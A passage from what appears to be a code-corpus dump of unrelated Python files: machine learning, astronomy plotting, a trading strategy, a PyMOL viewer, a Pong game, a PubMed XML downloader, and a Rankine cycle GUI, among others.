docIndex in trainingSet:\n\t\ttrainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n\t\ttrainClasses.append(classList[docIndex])\n\tp0V, p1V, pSpam = trainNB0(np.array(trainMat), np.array(trainClasses))\n\terrorCount = 0\n\tfor docIndex in testSet:\n\t\twordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n\t\tif classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n\t\t\terrorCount += 1\n\tprint('the error rate is:', float(errorCount) / len(testSet))\n\treturn vocabList, p0V, p1V\n\ndef getTopWords(ny, sf):\n\timport operator\n\tvocabList, p0V, p1V = localWords(ny, sf)\n\ttopNY = []\n\ttopSF = []\n\tfor i in range(len(p0V)):\n\t\tif p0V[i] > -6.0: topSF.append((vocabList[i], p0V[i]))\n\t\tif p1V[i] > -6.0: topNY.append((vocabList[i], p1V[i]))\n\tsortedSF = sorted(topSF, key=lambda pair: pair[1], reverse=True)\n\tprint(\"SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**\")\n\tfor item in sortedSF:\n\t\tprint(item[0])\n\tsortedNY = sorted(topNY, key=lambda pair: pair[1], reverse=True)\n\tprint(\"NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**\")\n\tfor item in sortedNY:\n\t\tprint(item[0])\n\nif __name__ == '__main__':\n\ttestingNB()\n\t#spamTest()","sub_path":"ML_InAction/NavieBayes.py","file_name":"NavieBayes.py","file_ext":"py","file_size_in_byte":11969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"39951800","text":"'''\nEstimate of surface brightness erg/s/cm^2/sr for shell ACS\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table\n\ntab = Table.read(\"arcs-summary.tab\", format=\"ascii.commented_header\", delimiter=\"\\t\",\n fill_values=('-', np.nan) )\n\n# photometric keywords from the ACS header\nSfactor_ACS = 0.0025030687604156482\n\nwith open(\"problem-sources.txt\") as f:\n problem_sources = f.read().split('\\n')\nwith open(\"interproplyd.txt\") as f:\n problem_sources += f.read().split('\\n')\n\nprint(problem_sources)\nlabel = tab['Object']\nm = np.isfinite(tab['R_out']) & np.isfinite(tab['R_in']) \nm = m & np.array([not source in problem_sources for source in tab['Object']])\n\nDistance = tab['D']\nDif_Bally = tab['Dif_Bally']\n\nSBally_physical = Sfactor_ACS*Dif_Bally\n\n#print label\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n#ax1.set_xlim(xmin=100,xmax=600)\n#ax1.set_ylim(ymin=0,ymax=10)\nfor x, y, s, e in zip(Distance[m], SBally_physical[m], label[m], Sfactor_ACS*tab['Delta'][m]):\n if e < y:\n ax1.plot(x,y,'bo')\n ax1.errorbar(x, y, yerr=e, c='b')\n size = 3\n else:\n ax1.plot(x,y,'r.')\n size = 2\n ax1.annotate(s, (x, y), alpha=0.5, size=size,\n xytext=(-3,3), textcoords='offset points', ha='right', va='bottom',)\n\nax1.plot(Distance, tab[\"Value_bg_Bally\"]*Sfactor_ACS, 'k.', alpha=0.4)\n\nax1.set_xlabel(r'$D$, arcsec')\nax1.set_ylabel(r'$S(\\mathrm{H\\alpha+NII})$, $\\mathrm{erg\\ s^{-1}\\ cm^{-2}\\ sr^{-1}}$')\nax1.set_xscale('log')\nax1.set_yscale('log')\n#ax1.set_title(r'fraction Difference shell y background vs D')\nax1.grid(True)\n\nfig.savefig(\"S(Ha+NII)_ACSshell.pdf\")\n","sub_path":"luis-programas/brightnes_phisical-shell.py","file_name":"brightnes_phisical-shell.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124857656","text":"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 18 11:35:48 2018\r\n\r\n@author: Edison\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt, numpy as np\r\n\r\ndef display(array, xlabel, ylabel, title, savefig):\r\n \"\"\"Takes in an array of values and plots them sequentially in a line graph\"\"\"\r\n \r\n x = [num for num in range(len(array))]\r\n y = array\r\n plt.plot(x, y)\r\n \r\n plt.xlabel(str(xlabel))\r\n plt.ylabel(str(ylabel))\r\n plt.title(str(title))\r\n plt.grid(True)\r\n plt.savefig(str(savefig))\r\n plt.show()\r\n \r\n\r\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"386048425","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Project: QuestionFromProfWang\n# File name: sort_picture\n# Author: Mark Wang\n# Date: 27/9/2016\n\nimport os\nimport shutil\n\nimport pandas as pd\n\nFORMER_RESULT_PATH = '/Users/warn/Documents/RAForWangZG/2016.9.18/xlsx_results'\nq = 8\n\nmax_sta_df = pd.read_excel(os.path.join(FORMER_RESULT_PATH, 'max_info_statistics.xlsx'),\n sheetname='division {} (no dup)'.format(q))\n\nsource_dir = 'output_picture_8'\ndst_dir = 'sorted_picture'\n\ni = 1\n\nfor method in max_sta_df['method']:\n src = os.path.join(source_dir, '{}.png'.format(method))\n dst = os.path.join(dst_dir, '{}.png'.format(i))\n shutil.copy(src, dst)\n i += 1\n","sub_path":"CarryTrade/spa_src_test/sort_picture.py","file_name":"sort_picture.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"324898715","text":"import pygame, os, sys\nimport data, durak;\n\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"0, 30\" #Sets window position to upper left corner\n\npygame.init()\n\n# Set screen dimensions according to monitor's size\nscreen_width = pygame.display.Info().current_w\nscreen_height = pygame.display.Info().current_h\n\nscreen = pygame.display.set_mode((screen_width, screen_height), pygame.HWSURFACE)\n\npygame.display.set_icon(pygame.image.load('Resources\\icon.jpg'))\npygame.display.set_caption(data.title)\n\ndef main():\n screen.fill(data.background_color)\n\n player_one = durak.Player(\"Player 1\")\n player_two = durak.Player(\"Player 2\")\n for player in [player_one, player_two]: player.take_cards()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"575411145","text":"class Node(object):\n def __init__(self, table, parent=None, direction=-1):\n self.table = table\n self.parent = parent\n if parent is None:\n self.depth = 0\n else:\n self.depth = parent.depth + 1\n\n # How the node table was obtained from the previous table\n self.direction = direction\n\n def has_repeated(self):\n current_node = self.parent\n\n while True:\n if self == current_node:\n return True\n if current_node.parent is None:\n return False\n current_node = current_node.parent\n","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"523329860","text":"import sys\nfrom rsstag.routes import RSSTagRoutes\nfrom rsstag.letters import RssTagLetters\nfrom rsstag.utils import load_config\nfrom rsstag.tags import RssTagTags\nfrom pymongo import MongoClient\n\ndef make_letters(db, config):\n router = RSSTagRoutes(config['settings']['host_name'])\n user = db.users.find_one({})\n letters = RssTagLetters(db)\n tags = RssTagTags(db)\n all_tags = tags.get_all(user['sid'], projection={'tag': True, 'unread_count': True})\n result = False\n if tags:\n result = letters.sync_with_tags(user['sid'], all_tags, router)\n\n return result\n\nif __name__ == '__main__':\n config_path = 'rsscloud.conf'\n if len(sys.argv) > 1:\n config_path = sys.argv[1]\n config = load_config(config_path)\n cl = MongoClient(config['settings']['db_host'], int(config['settings']['db_port']))\n db = cl[config['settings']['db_name']]\n result = make_letters(db, config)\n if result:\n print('Done')\n else:\n print('Not done, result - ', result)\n","sub_path":"make_letters.py","file_name":"make_letters.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"66768333","text":"import pandas as pd\nimport requests\nimport time\nimport sys\n\nstrt = int(sys.argv[1])\nend = int(sys.argv[2])\n\npmcdata = pd.read_csv('PMC-ids.csv')\npmcid_full= pmcdata['PMCID']\ndata_type = 'PMC'\npmcid = pmcdata['PMCID'].str[3:]\n\npmcid_list = pmcid[strt:end]\n\nurl_1 = 'https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pmc&id='\n#url_2 = '&tool=my_tool&email=my_email@example.com'\nfull_url = url_1+pmcid_list\n#+url_2\n\nfor i in full_url.index.values:\n response = requests.get(full_url[i])\n with open(data_type+pmcid_list[i]+'.xml', 'wb') as file:\n file.write(response.content)\n file.close()\n time.sleep(1.5)\n","sub_path":"pmc_xml_download_argv.py","file_name":"pmc_xml_download_argv.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"592463240","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui\n\nimport os\n\nfrom geopicardie.utils.plugin_globals import GpicGlobals\n\n\nclass AboutBox(QtGui.QDialog):\n \"\"\"\n About box of the plugin\n \"\"\"\n\n def __init__(self, parent=None):\n\n QtGui.QWidget.__init__(self, parent)\n\n mainLayout = QtGui.QVBoxLayout()\n\n logo_file_path = GpicGlobals.Instance().geopic_logo_file_path\n self.logo = QtGui.QLabel()\n self.logo.setPixmap(QtGui.QPixmap(logo_file_path))\n mainLayout.addWidget(self.logo)\n\n\n title = u\"À propos de l'extension GéoPicardie…\"\n description = u\"\"\"Extension pour QGIS donnant un accès simplifié aux ressources géographiques utiles aux partenaires de GéoPicardie\nVersion {0}\nPlus d'informations à l'adresse suivante : {1}\n \"\"\".format(GpicGlobals.Instance().PLUGIN_VERSION,\n GpicGlobals.Instance().PLUGIN_SOURCE_REPOSITORY)\n\n self.textArea = QtGui.QTextEdit()\n self.textArea.setReadOnly(True)\n self.textArea.setText(description)\n self.textArea.setFrameShape(QtGui.QFrame.NoFrame)\n mainLayout.addWidget(self.textArea)\n\n self.setModal(True)\n self.setSizeGripEnabled(False)\n\n self.setLayout(mainLayout)\n\n self.setFixedSize(400, 250)\n self.setWindowTitle(title)","sub_path":"plugin/geopicardie/gui/about_box.py","file_name":"about_box.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"431750042","text":"import os\n\nfrom dagster import check\n\nfrom .config_type import ConfigIntInstance, ConfigStringInstance, ScalarUnion\nfrom .field_utils import Selector\n\n\nclass StringSourceType(ScalarUnion):\n def __init__(self):\n super(StringSourceType, self).__init__(\n scalar_type=ConfigStringInstance,\n non_scalar_type=Selector({'env': str}),\n _key='StringSourceType',\n )\n\n def post_process(self, value):\n if not isinstance(value, dict):\n return value\n\n key, cfg = list(value.items())[0]\n if key == 'env':\n value = os.getenv(cfg)\n check.invariant(\n value is not None, 'Environment variable \"{var}\" is not set.'.format(var=cfg)\n )\n return value\n else:\n check.failed('Invalid source selector key')\n\n\nclass IntSourceType(ScalarUnion):\n def __init__(self):\n super(IntSourceType, self).__init__(\n scalar_type=ConfigIntInstance,\n non_scalar_type=Selector({'env': str}),\n _key='IntSourceType',\n )\n\n def post_process(self, value):\n if not isinstance(value, dict):\n return value\n\n key, cfg = list(value.items())[0]\n if key == 'env':\n value = os.getenv(cfg)\n check.invariant(\n value is not None, 'Environment variable \"{var}\" is not set.'.format(var=cfg)\n )\n return int(value)\n else:\n check.failed('Invalid source selector key')\n\n\nStringSource = StringSourceType()\nIntSource = IntSourceType()\n","sub_path":"python_modules/dagster/dagster/config/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"346667566","text":"\"\"\"\nGatech OMSCS CS 7646\nAutumn 2018\nHomework Assignment - Manual Strategy\nHaohao Wang (hwang404)\n\"\"\"\nfrom util import get_data\nimport pandas as pd\nimport datetime as dt\nimport numpy as np\nfrom marketsimcode import compute_portvals\nimport matplotlib.pyplot as plt\nimport indicators\n\ndef testPolicy(symbol=[\"JPM\"], sd=dt.datetime(2010,1,1), ed=dt.datetime(2011,12,31), sv=100000):\n prices = get_data(['JPM'], pd.date_range(sd, ed), addSPY=True, colname = 'Adj Close')\n\n # mean_5 = indicators.mean_2(prices)\n # mean_5 = mean_5[19:]\n orders = pd.DataFrame().reindex_like(prices)\n orders = orders.rename(index=str, columns={\"SPY\":\"Position\", \"JPM\":\"Symbol\"})\n orders['Symbol'] = 'JPM'\n orders['Shares'] = 0\n orders['Position'] = 0\n orders['Order'] = 'HOLD'\n orders.index.name = 'Date'\n orders.index = pd.to_datetime(orders.index, format=\"%Y/%m/%d\")\n\n # # SMA\n # sma_20 = indicators.sma(prices, 20)\n # sma_5 = indicators.sma(prices, 5)\n # for date, row in orders.iloc[2:, :].iterrows():\n # stock = row['Symbol']\n # i = orders.index.get_loc(date)\n # p0 = prices.iloc[i, 1]\n # sma_5_1 = sma_5.iloc[i-1, 1]\n # sma_20_1 = sma_20.iloc[i-1, 1]\n # sma_5_2 = sma_5.iloc[i-2, 1]\n # sma_20_2 = sma_20.iloc[i-2, 1]\n # current = row['Position']\n # if sma_5_1 < sma_20_1 and sma_5_2 > sma_20_2: # buy\n # target = min(1000, sv // p0 + current)\n # orders.loc[date, 'Shares'] = target - current\n # orders.loc[date, 'Position'] = target\n # orders.loc[date, 'Order'] = 'BUY'\n # sv -= (target - current) * p0\n # elif sma_5_1 > sma_20_1 and sma_5_2 < sma_20_2:\n # target = min(1000, sv // p0 + current)\n # orders.loc[date, 'Shares'] = target - current\n # orders.loc[date, 'Position'] = -target\n # orders.loc[date, 'Order'] = 'SELL'\n # sv += (target - current) * p0\n # else:\n # orders.loc[date, 'Shares'] = 0\n # orders.loc[date, 'Position'] = current\n # orders.loc[date, 'Order'] = 'HOLD'\n #SMA\n sma = indicators.sma(prices, 10)\n for date, row in orders.iloc[2:, :].iterrows():\n stock = row['Symbol']\n i = orders.index.get_loc(date)\n p0 = prices.iloc[i, 1]\n p1 = prices.iloc[i-1, 1]\n ma1 = sma.iloc[i-1, 1]\n p2 = prices.iloc[i-2, 1]\n ma2 = sma.iloc[i-2, 1]\n current = row['Position']\n if p1 < ma1 * 0.95: # buy\n target = min(1000, sv // p0 + current)\n orders.loc[date, 'Shares'] = target - current\n orders.loc[date, 'Position'] = target\n orders.loc[date, 'Order'] = 'BUY'\n sv -= (target - current) * p0\n elif p1 > ma1 * 1.05:\n target = min(1000, sv // p0 + current)\n orders.loc[date, 'Shares'] = target - current\n orders.loc[date, 'Position'] = -target\n orders.loc[date, 'Order'] = 'SELL'\n sv += (target - current) * p0\n else:\n orders.loc[date, 'Shares'] = 0\n orders.loc[date, 'Position'] = current\n orders.loc[date, 'Order'] = 'HOLD'\n return orders\n\ndef getBenchmark(sd, ed, shares=1000, symbol='JPM'):\n benchmark = get_data([symbol], pd.date_range(sd, ed))\n benchmark = benchmark[symbol] * shares + 100000 - benchmark.iloc[0, 1] * 1000\n return benchmark\n\nif __name__ == '__main__':\n start_date = dt.datetime(2010,1,1)\n end_date = dt.datetime(2011,12,31)\n starting_value = 100000\n orders = testPolicy(symbol=[\"JPM\"], sd=start_date, ed=end_date, sv=starting_value)\n benchmark = ml.getBenchmark(shares=1000, sd=start_date, ed=end_date, symbol=['JPM'])\n benchmark = benchmark / benchmark.iloc[0]\n manual_str = compute_portvals(orders, start_val = starting_value, commission=9.95, impact=0.005)\n manual_str = manual_str / manual_str.iloc[0]\n ax = benchmark.plot(x=None, y='JPM', color='blue')\n ax = manual_str.plot(y='PortVal', ax=ax, color='black')\n ymin, ymax = ax.get_ylim()\n ax.vlines(x=orders[orders['Order'] == 'BUY'].index, ymin=ymin, ymax=ymax, color='g', lw=0.2)\n ax.vlines(x=orders[orders['Order'] == 'SELL'].index, ymin=ymin, ymax=ymax, color='r', lw=0.2)\n ax.legend([\"Benchmark\", \"Manual Strategy\"])\n plt.show()\n","sub_path":"strategy_learner/ManualStrategy.py","file_name":"ManualStrategy.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148479954","text":"#Pong game\n#this game is for the user who can press \"q\" button on the keyboard to move up\n#the paddle on the left or press \"a\" button to move down.\n#press \"p\" can move the right paddle up, and press \"l\" to move the right paddle \n#down. when weither side of the score hits 11, game over. \n\nimport pygame, sys, time\nfrom pygame.locals import *\n\n# User-defined classes\n\n# User-defined functions\n\ndef main():\n\n # Initialize pygame\n pygame.init()\n pygame.font.init()\n\n surfaceSize = (500, 400)\n windowTitle = 'Pong'\n frameDelay = 0.02\n\n surface = pygame.display.set_mode(surfaceSize, 0, 0)\n pygame.display.set_caption(windowTitle)\n\n # creat two paddles and one circle.\n gameOver = False\n paddle1 = [50,160,10,50]\n paddle2 = [440,160,10,50]\n ballRadius = 5\n ballCenter = [250, 200]\n ballSpeed = [10,4]\n score = [0, 0]\n\n pygame.display.update()\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n #quit game\n if max(score)<11:\n moveBall(ballCenter, ballSpeed, ballRadius, score, surface)\n movePaddle(paddle1, paddle2)\n collision(ballCenter, ballSpeed, paddle1, paddle2,surface) \n gameOver = update(ballCenter, ballRadius, paddle1, paddle2, score, surface)\n \n pygame.display.update()\n\n time.sleep(frameDelay)\n\ndef update(ballCenter, ballRadius, paddle1, paddle2, score, surface):\n\n surface.fill(pygame.Color('black'))\n pygame.draw.circle(surface, pygame.Color('white'), ballCenter, ballRadius , 0)\n pygame.draw.rect(surface, pygame.Color('white'), paddle1, 0)\n pygame.draw.rect(surface, pygame.Color('white'), paddle2, 0)\n tempsurface=pygame.font.SysFont(None,72).render(str(score[0]), 1, pygame.Color('white'))\n surface.blit(tempsurface, (0, 0), None, 0)\n tempsurface=pygame.font.SysFont(None,72).render(str(score[1]), 1, pygame.Color('white'))\n tempsize = tempsurface.get_size()\n size = surface.get_size()\n surface.blit(tempsurface, (size[0]-tempsize[0], 0), None, 0)\n \n return False\n\ndef moveBall(ballCenter, ballSpeed, ballRadius, score, surface):\n size = surface.get_size()\n for coord in range(0,2):\n ballCenter[coord] = ballCenter[coord] + ballSpeed[coord]\n if ballCenter[coord] < ballRadius:\n #change the ball direction\n ballSpeed[coord] = -ballSpeed[coord]\n #add score\n score[1]+=abs(coord-1)\n if ballCenter[coord] + ballRadius > size[coord]:\n ballSpeed[coord] = -ballSpeed[coord]\n score[0]+=abs(coord-1)\n\ndef movePaddle(paddle1, paddle2):\n keys = pygame.key.get_pressed()\n paddle1[1]=max(0,paddle1[1]-10*keys[K_q])\n #the top of the left paddle's y-coordinate is 0\n paddle1[1]=min(400-paddle1[3],paddle1[1]+10*keys[K_a])\n #the bottom of the left paddle's y-coordinate is 400-50=350\n paddle2[1]=max(0,paddle2[1]-10*keys[K_p])\n #the top of the right paddle's y-coordinate is 0\n paddle2[1]=min(400-paddle2[3],paddle2[1]+10*keys[K_l])\n #the top of the right paddle's y-coordinate is 400-50=350, but the \n #x-coordinate is different to the left paddle's.\n \ndef collision(ballCenter, ballSpeed, paddle1, paddle2,surface):\n #set paddle=draw the two paddles.\n paddle1=pygame.draw.rect(surface, pygame.Color('white'), paddle1, 0)\n paddle2=pygame.draw.rect(surface, pygame.Color('white'), paddle2, 0) \n if paddle1.collidepoint(ballCenter):\n if ballSpeed[0]<0:\n #change the direction of the ball's speed\n ballSpeed[0]= -ballSpeed[0] \n \n if paddle2.collidepoint(ballCenter):\n if ballSpeed[0]>0:\n #change the direction of the ball's speed\n ballSpeed[0]= -ballSpeed[0]\n\nmain()","sub_path":"pong/pong final.py","file_name":"pong final.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"439919792","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n''' Align a list of molecules using `super` command in PyMol. The first item \n in the list is considered as the reference. \n'''\n\nimport pymolPy3\nimport pyrotein as pr\nimport os\nimport colorsimple as cs\nfrom loaddata import load_xlsx\n\n# Specify chains to process...\nfl_chain = \"chains.comp.xlsx\"\nlines = load_xlsx(fl_chain)\ndrc = \"pdb\"\n\n# Define atoms used for distance matrix analysis...\npeptide = [\"N\", \"CA\", \"C\", \"O\"]\n\n# Specify the range of atoms from rhodopsin...\nnterm = 1\ncterm = 348\nlen_atoms_peptide = (cterm - nterm + 1) * len(peptide)\n\n# Start pymol\npm = pymolPy3.pymolPy3()\n## pm(\"bg white\")\n\n# Get the color palette...\ncolor_items = [ i[4] for i in lines ]\nspe = { i : 0 for i in color_items }.keys()\ncolor_dict = cs.color_species(spe, hexsym = '0x')\n\n# Go through each mobile\nfor line in lines:\n # Unpack parameters\n _, pdb, chain, _, chrome = line[:5]\n\n # Load a mobile structure...\n entry = f\"{pdb}_{chain}.align\"\n pdb_path = os.path.join(drc, f\"{entry}.pdb\")\n pm(f\"load {pdb_path}\")\n\n # Show cartoon and custom it...\n pm(f\"show cartoon, %{entry}\")\n pm(f\"set cartoon_color, {color_dict[chrome]}, %{entry}\")\n\n # Set ribbon color...\n pm(f\"set ribbon_color, {color_dict[chrome]}, %{entry}\")\n\n\n# Customization\n\n# Set view...\npm(\"set_view (\\\\\")\npm(\" 0.796704233 , -0.603343129, 0.035119072,\\\\\")\npm(\" -0.342249423 , -0.402523756, 0.849020958,\\\\\")\npm(\" -0.498112202 , -0.688440979, -0.527183950,\\\\\")\npm(\" -0.000300951 , -0.000151135, -243.658477783,\\\\\")\npm(\" 58.718177795 , 8.645618439, -0.894862056,\\\\\")\npm(\" -1408.164916992, 1895.492553711, -20.000000000 )\")\n\n## # Set the lighting...\n## pm(\"set ambient , 0.05\")\n## pm(\"set direct , 0.2\" )\n## pm(\"set spec_direct , 0\" )\n## pm(\"set shininess , 10.\" )\n## pm(\"set reflect , 0.38\" )\n## pm(\"set spec_count , -1\" )\n## pm(\"set spec_reflect , -1.\" )\n## pm(\"set specular , 1\" )\n## pm(\"set specular_intensity, 0.5\" )\n\n# Hide the non-rhodopsin region...\npm(f\"hide cartoon, (not resi {nterm}-{cterm})\")\npm(f\"hide ribbon, (not resi {nterm}-{cterm})\")\n\n# Hide retinal...\npm(f\"hide everything, resn ret\")\n\n# Export...\ninput(\"Press Enter to exit...\")\n## pm(\"ray 1497, 1600, async=1\")\n## pm(\"draw 4491, 6400\")\n## pm(\"png align.view.png\")\n","sub_path":"examples/view.species.py","file_name":"view.species.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"613666241","text":"from Rankine_GUI import Ui_Form\nfrom PyQt5 import uic\nimport sys\nfrom PyQt5 import QtWidgets as qtw\nfrom Rankine import rankine, rankineCycleController, rankineCycleView\nfrom Steam import *\n\n# these imports are necessary for draw Problem 2 is essentially just rearrangining a matplot lib graph on my GUI\n# no simple widget for this exists in QT Designer, so I have to add the widget in code.\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\n\n\nclass MainWindow(qtw.QWidget, Ui_Form):\n def __init__(self):\n \"\"\"MainWindow constructor\"\"\"\n super().__init__()\n self.setupUi(self)\n\n # Main UI code goes here\n self.le_TurbineInletCondition.setEnabled(False)\n self.calculated = False\n # creating a canvas to draw a figure for the rankine cycle\n self.figure = Figure(figsize=(3, 8), tight_layout=True, frameon=True, facecolor='none')\n self.canvas = FigureCanvasQTAgg(self.figure)\n self.ax = self.figure.add_subplot()\n self.main_VerticalLayout.addWidget(self.canvas)\n\n # setting up some signals and slots\n self.le_PHigh.editingFinished.connect(self.setPHigh) # triggered by hitting enter or leaving the line edit\n self.le_PLow.editingFinished.connect(self.setPLow) # triggered by hitting enter or leaving the line edit\n self.le_TurbineEff.editingFinished.connect(self.checkTurbineEffRange)\n self.rdo_Quality.toggled.connect(self.setQualityOrTHigh) # triggered when the state of the radio button changes\n self.btn_Calculate.clicked.connect(self.calcRankine)\n self.cmb_Abcissa.currentIndexChanged.connect(self.doPlot)\n self.cmb_Ordinate.currentIndexChanged.connect(self.doPlot)\n self.chk_LogAbcissa.stateChanged.connect(self.doPlot)\n self.chk_LogOrdinate.stateChanged.connect(self.doPlot)\n # End main ui code\n\n # create a rankine object to work with later\n self.RC = rankine()\n self.Controller = rankineCycleController()\n self.View = rankineCycleView()\n\n self.Controller.set(8, 8000, name='Default Rankine Cycle')\n self.Controller.buildVaporDomeData()\n # create a steam object to help with retrieving saturated properties\n self.WorkingFluid = steam(8000, x=1.0)\n\n self.satPHigh = satProps()\n self.satPLow = satProps()\n # call the functions to set the saturation properties during construction of this class\n self.setPHigh()\n self.setPLow()\n\n # show the form\n self.show()\n\n def clamp(self, val, low, high):\n if self.isfloat(val):\n val = float(val)\n if val > high:\n return float(high)\n if val < low:\n return float(low)\n return val\n return float(low)\n\n def isfloat(self, value):\n '''\n This function is a check to verify that a string can be converted to a float\n :return:\n '''\n if value == 'NaN': return False\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def setPHigh(self):\n # make sure it is a number\n ph = self.le_PHigh.text()\n if not self.isfloat(ph):\n ph = '80'\n self.le_PHigh.setText(ph)\n\n PHigh = float(ph) # convert text to number\n self.satPHigh = self.WorkingFluid.getSatProp(P_Bar=PHigh)\n self.TSatHigh = self.satPHigh.Tsat\n st_high = 'PSat = {:0.2f} bar, TSat = {:0.2f} C'.format(PHigh, self.satPHigh.Psat)\n st_high += '\\nhf = {:0.2f} kJ/kg, hg = {:0.2f} kJ/kg'.format(self.satPHigh.hf, self.satPHigh.hg)\n st_high += '\\nsf = {:0.2f} kJ/kg*K, sg = {:0.2f} kJ/kg*k'.format(self.satPHigh.sf, self.satPHigh.sg)\n st_high += '\\nvf = {:0.4f} m^3/kg, vg = {:0.2f} m^3/kg'.format(self.satPHigh.vf, self.satPHigh.vg)\n self.lbl_SatPropHigh.setText(st_high)\n\n def setPLow(self):\n # make sure it is a number\n pl = self.le_PLow.text()\n if not self.isfloat(pl):\n pl = '0.08'\n self.le_PLow.setText(pl)\n\n PLow = float(self.le_PLow.text()) # convert text to number\n self.satPLow = self.WorkingFluid.getSatProp(P_Bar=PLow)\n # (Tsat, hf, hg, sf, sg, vf, vg)\n st_low = 'PSat = {:0.2f} bar, TSat = {:0.2f} C'.format(PLow, self.satPLow.Tsat)\n st_low += '\\nhf = {:0.2f} kJ/kg, hg = {:0.2f} kJ/kg'.format(self.satPLow.hf, self.satPLow.hg)\n st_low += '\\nsf = {:0.2f} kJ/kg*K, sg = {:0.2f} kJ/kg*k'.format(self.satPLow.sf, self.satPLow.sg)\n st_low += '\\nvf = {:0.4f} m^3/kg, vg = {:0.2f} m^3/kg'.format(self.satPLow.vf, self.satPLow.vg)\n self.lbl_SatPropLow.setText(st_low)\n\n def checkTurbineEffRange(self):\n '''\n Makes sure turbine efficiency is in the range from 0 to 1\n :return:\n '''\n e = self.clamp(self.le_TurbineEff.text(), 0.0, 1.0)\n self.le_TurbineEff.setText(str(e))\n\n def setQualityOrTHigh(self):\n TF = self.rdo_Quality.isChecked()\n if TF:\n self.lbl_TurbineInletCondition.setText('Turbine Inlet: x=')\n self.le_TurbineInletCondition.setText(str(1.0))\n self.le_TurbineInletCondition.setEnabled(False)\n else:\n self.lbl_TurbineInletCondition.setText('Turbine Inlet: T High =')\n self.le_TurbineInletCondition.setText('{:0.2f}'.format(self.TSatHigh + 1))\n self.le_TurbineInletCondition.setEnabled(True)\n\n def doPlot(self):\n self.ax.clear()\n X = self.cmb_Abcissa.currentText()\n Y = self.cmb_Ordinate.currentText()\n logx = self.chk_LogAbcissa.isChecked()\n logy = self.chk_LogOrdinate.isChecked()\n self.Controller.plot_cycle_XY(X=X, Y=Y, ax=self.ax, logx=logx, logy=logy)\n self.canvas.draw()\n\n def calcRankine(self):\n '''\n This is called when the calculate button is clicked\n :return: nothing\n '''\n # read the high and low pressure isobar values. no range checking.\n PHigh = float(self.le_PHigh.text())\n PLow = float(self.le_PLow.text())\n\n # create a new rankine object with values depending on which radio buttton checked\n if (self.rdo_Quality.isChecked()):\n self.Controller.set(p_low=PLow * 100, p_high=PHigh * 100, eff_turbine=float(self.le_TurbineEff.text()))\n else:\n self.Controller.set(p_low=PLow * 100, p_high=PHigh * 100, eff_turbine=float(self.le_TurbineEff.text()),\n t_high=float(self.le_TurbineInletCondition.text()))\n # calculate the cycle efficiency (and states 1,2,3,4)\n self.Controller.calc_efficiency()\n\n # fill out the enthalpy values\n self.le_H1.setText('{:0.2f}'.format(self.Controller.state1.h))\n self.le_H2.setText('{:0.2f}'.format(self.Controller.state2.h))\n self.le_H3.setText('{:0.2f}'.format(self.Controller.state3.h))\n self.le_H4.setText('{:0.2f}'.format(self.Controller.state4.h))\n\n # fill out the other properties for the rankine cycle\n self.le_Efficiency.setText('{:0.2f}'.format(self.Controller.efficiency))\n self.le_TurbineWork.setText('{:0.2f}'.format(self.Controller.turbine_work))\n self.le_PumpWork.setText('{:0.2f}'.format(self.Controller.pump_work))\n self.le_HeatAdded.setText('{:0.2f}'.format(self.Controller.heat_added))\n\n self.doPlot()\n self.cmb_Abcissa.setEnabled(True)\n self.cmb_Ordinate.setEnabled(True)\n # self.ax.clear()\n # self.RC.plot_cycle_XY(X='s', Y='T', ax=self.ax)\n # self.canvas.draw()\n\n # self.ax.clear()\n # self.RC.plot_cycle_XY(X='h', Y='T', 